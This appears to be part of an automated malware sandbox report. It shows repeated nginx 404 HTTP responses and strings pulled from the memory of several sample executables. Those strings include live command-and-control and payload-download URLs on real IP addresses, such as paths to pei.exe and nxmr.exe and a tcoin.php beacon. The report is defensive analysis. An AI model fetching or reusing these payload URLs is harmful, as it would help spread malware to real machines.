72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 05 Dec 2024 16:35:28 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 05 Dec 2024 16:35:32 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 05 Dec 2024 16:35:52 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 05 Dec 2024 16:35:56 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 05 Dec 2024 16:36:00 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: 896429707.exe, 00000004.00000000.1387726862.0000000000410000.00000002.00000001.01000000.00000008.sdmp, 896429707.exe, 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmp, 896429707.exe, 00000004.00000003.1419564310.0000000000596000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000000.1419524273.0000000000410000.00000002.00000001.01000000.00000009.sdmp, sysnldcvmr.exe, 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmp, sysnldcvmr.exe, 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmp, sysnldcvmr.exe, 00000007.00000000.1542059561.0000000000410000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://185.215.113.66/
                          Source: sysnldcvmr.exe, 00000005.00000003.1503489308.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000003.1504517011.00000000006EE000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000003.1504556387.0000000000687000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000003.1503974451.00000000006AA000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000003.1503599612.00000000006EC000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000003.1503762545.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000003.1504110490.00000000006E4000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000002.3945918610.0000000000676000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000003.1503639237.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000003.1503849850.00000000006E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/1
                          Source: sysnldcvmr.exe, 00000005.00000003.1504556387.0000000000687000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/1A
                          Source: sysnldcvmr.exe, 00000005.00000003.1503489308.00000000006AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/1JJC:
                          Source: sysnldcvmr.exe, 00000005.00000003.1503489308.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000003.1503639237.00000000006E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/1LMEM0X
                          Source: sysnldcvmr.exe, 00000005.00000003.1503489308.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000003.1504517011.00000000006EE000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000003.1503974451.00000000006AA000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000003.1503599612.00000000006EC000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000003.1503762545.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000003.1504110490.00000000006E4000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000003.1503849850.00000000006E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/1oC
                          Source: sysnldcvmr.exe, 00000005.00000003.1503489308.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000003.1503639237.00000000006E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/1r
                          Source: sysnldcvmr.exe, 00000005.00000002.3945918610.0000000000676000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/1~
                          Source: sysnldcvmr.exe, 00000005.00000002.3945918610.0000000000688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/2
                          Source: sysnldcvmr.exe, 00000005.00000002.3945918610.0000000000688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/2H
                          Source: sysnldcvmr.exe, 00000005.00000002.3949590781.00000000006FB000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000002.3945918610.00000000006C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/3
                          Source: sysnldcvmr.exe, 00000005.00000002.3945918610.0000000000688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/3$
                          Source: sysnldcvmr.exe, 00000005.00000002.3945918610.0000000000688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/3A
                          Source: sysnldcvmr.exe, 00000005.00000002.3949590781.00000000006FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/3C:
                          Source: sysnldcvmr.exe, 00000005.00000002.3949590781.00000000006FB000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000002.3945918610.0000000000688000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000002.3945918610.00000000006C0000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000002.3945918610.00000000006AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/4
                          Source: sysnldcvmr.exe, 00000005.00000002.3949590781.00000000006FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/4C:
                          Source: sysnldcvmr.exe, 00000005.00000002.3945918610.0000000000688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/4T
                          Source: sysnldcvmr.exe, 00000005.00000002.3945918610.0000000000688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/5
                          Source: sysnldcvmr.exe, 00000005.00000002.3949590781.00000000006FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/5C:
                          Source: 896429707.exe, 00000004.00000000.1387726862.0000000000410000.00000002.00000001.01000000.00000008.sdmp, 896429707.exe, 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmp, 896429707.exe, 00000004.00000003.1419564310.0000000000596000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000000.1419524273.0000000000410000.00000002.00000001.01000000.00000009.sdmp, sysnldcvmr.exe, 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmp, sysnldcvmr.exe, 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmp, sysnldcvmr.exe, 00000007.00000000.1542059561.0000000000410000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://185.215.113.66/http://91.202.233.141/12345%s%s%s:Zone.Identifier%userprofile%%windir%%s
                          Source: f5TWdT5EAc.exe, 00000000.00000002.1369536312.0000000004CCE000.00000004.00000020.00020000.00000000.sdmp, f5TWdT5EAc.exe, 00000000.00000002.1366701322.000000000019A000.00000004.00000010.00020000.00000000.sdmp, f5TWdT5EAc.exe, 00000000.00000002.1369536312.0000000004C7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/pei.exe
                          Source: f5TWdT5EAc.exe, 00000000.00000002.1369536312.0000000004C7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/pei.exeA
                          Source: f5TWdT5EAc.exe, 00000000.00000002.1369536312.0000000004C7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/pei.exeH
                          Source: f5TWdT5EAc.exe, 00000000.00000002.1369536312.0000000004C7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/pei.exePPC:
                          Source: 640832494.exeString found in binary or memory: http://185.215.113.66/tcoin.php?s=%s
                          Source: 78476062.exe, 0000000B.00000002.1777292756.0000000000E4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.84/
                          Source: 78476062.exe, 0000000B.00000002.1777292756.0000000000E43000.00000004.00000020.00020000.00000000.sdmp, 78476062.exe, 0000000B.00000002.1777292756.0000000000E2D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.84/nxmr.exe
                          Source: 78476062.exe, 0000000B.00000002.1777292756.0000000000E43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.84/nxmr.exe($B
                          Source: 78476062.exe, 0000000B.00000002.1777292756.0000000000E30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.84/nxmr.exeP
                          Source: sysnldcvmr.exe, 00000005.00000003.1690649668.00000000009DD000.00000004.00000020.00020000.00000000.sdmp, 78476062.exe, 0000000B.00000002.1777160846.00000000007C2000.00000002.00000001.01000000.0000000C.sdmp, 78476062.exe, 0000000B.00000000.1623646967.00000000007C2000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: http://185.215.113.84/nxmr.exeP0
                          Source: 896429707.exe, 00000004.00000000.1387726862.0000000000410000.00000002.00000001.01000000.00000008.sdmp, 896429707.exe, 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmp, 896429707.exe, 00000004.00000003.1419564310.0000000000596000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000000.1419524273.0000000000410000.00000002.00000001.01000000.00000009.sdmp, sysnldcvmr.exe, 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmp, sysnldcvmr.exe, 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmp, sysnldcvmr.exe, 00000007.00000000.1542059561.0000000000410000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://91.202.233.141/
                          Source: sysnldcvmr.exe, 00000005.00000002.3945918610.0000000000688000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000002.3945918610.00000000006AA000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000002.3945918610.0000000000676000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/1
                          Source: sysnldcvmr.exe, 00000005.00000002.3945918610.000000000062E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/1aenh.dlly
                          Source: sysnldcvmr.exe, 00000005.00000002.3950944128.000000000233B000.00000004.00000010.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000002.3945918610.0000000000688000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000002.3945918610.00000000006AA000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000002.3949590781.00000000006EF000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000002.3945918610.0000000000676000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/2
                          Source: sysnldcvmr.exe, 00000005.00000002.3945918610.0000000000676000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/2W
                          Source: sysnldcvmr.exe, 00000005.00000002.3945918610.0000000000688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/2k
                          Source: sysnldcvmr.exe, 00000005.00000002.3945918610.0000000000688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/2~
                          Source: sysnldcvmr.exe, 00000005.00000002.3945918610.0000000000688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/3
                          Source: sysnldcvmr.exe, 00000005.00000002.3945918610.0000000000688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/3S
                          Source: sysnldcvmr.exe, 00000005.00000002.3945918610.0000000000688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/4
